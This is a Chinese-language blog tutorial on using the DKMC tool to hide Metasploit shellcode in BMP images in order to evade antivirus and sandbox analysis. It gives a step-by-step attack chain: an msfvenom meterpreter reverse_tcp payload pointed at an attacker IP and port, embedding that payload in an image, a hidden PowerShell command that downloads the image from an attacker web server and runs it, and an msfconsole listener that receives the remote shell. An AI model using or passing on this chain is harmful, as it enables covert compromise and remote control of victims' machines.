最新消息:

DKMC | bmp | Msf | kali linux 2017

安全工具 demon 1686浏览 0评论

背景

和往常一样,我习惯般的浏览着一些国外的技术站点。其中某个技术视频中所使用的一款工具引起了我的注意,这款工具的名字也非常特别叫做DKMC(Don’t Kill My Cat ),直译为不要杀我的猫。从其GitHub上的介绍来看,DKMC是一款用于将shellcode代码混淆至图片文件格式的工具。其目的是为了有效躲避沙盒分析及杀毒软件的查杀。目前,该工具最终的shellcode payload执行仅支持PowerShell。

基本流程(过程)

  1. 生成shellcode (msfvenom)
  2. 将msf的shellcode嵌入到图片内
  3. PowerShell下载图片并执行图片作为shellcode
  4. 得到 shell

安装使用

$ git clone https://github.com/Mr-Un1k0d3r/DKMC 
$ cd DKMC
$ mkdir output

使用准备

1.将所有类型的图片都转换bmp格式,关于如何转换可自行百度在线转换地址。我这里已经提前转换好了:

2.准备一枚由msfvenom 生成的PAYLOAD,使用为未初始化的格式

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORt=4444 -f raw >demon

3.启动msfconsole (控制台),进行监听

运行DKMC

首先,我们进入它的初始界面

先来简单介绍一下:

  • sc功能是将msf生成的raw文件 转换位shellcode代码
  • gen功能是将其msf的shellcode注入到BMP 图片中
  • ps功能将其BMP的图片转换为powershell代码
  • web功能将其开启web功能

1.首先我们要用到的是sc功能

(将其msf的shellcode注入到BMP图片中)

设置msfvenom生成的文件路径,然后run生成shellcode

(shellcode)>>> set source demon
    [+] source value is set.
(shellcode)>>> run

将其shellcode代码进行保存,或者保存到文本文档 ,一会需要用到。我们使用exit退出当前模块,回到主菜单界面:

2.gen功能

(是将其msf的shellcode注入到BMP图片中)

这里需要设置两个地方:

  1. 转换后的bmp图片文件
  2. 设置shellcode

之后run ,output中会生成一个新的bmp是由msfpayload注入生成的,之后我们还是一样exit,退回主界面使用ps功能。

3.ps功能

(功能将其BMP的图片转换为powershell代码)

这里需要设置的是url 这块,格式 set url http://ip地址 :端口号 /x.bmp

(powershell)>>> set url http://192.168.1.103:8081/output-1506265715.bmp
    [+] url value is set.
(powershell)>>> run
[+] Powershell script:
powershell.exe -nop -w hidden

复制powershell代码 到文本文档 (可将其编辑格式为bat 或者ps1 即可)(本文不编辑其他格式直接复制粘贴代码)

4.web功能(开启web服务)

folder 我这里就不设置他 ,因为bmp 生成的默认地址就是这个,需要改动的是我之前设置了url端口为8081,所以我这里也需要设置的一样为8081

5.运行代码,得到会话

得到会话,(这里我直接复制粘贴代码,可以选择将其编辑为bat、ps1、exe等格式运行)

视频演示:

转载请注明:即刻安全 » DKMC | bmp | Msf | kali linux 2017

您必须 登录 才能发表评论!



合作伙伴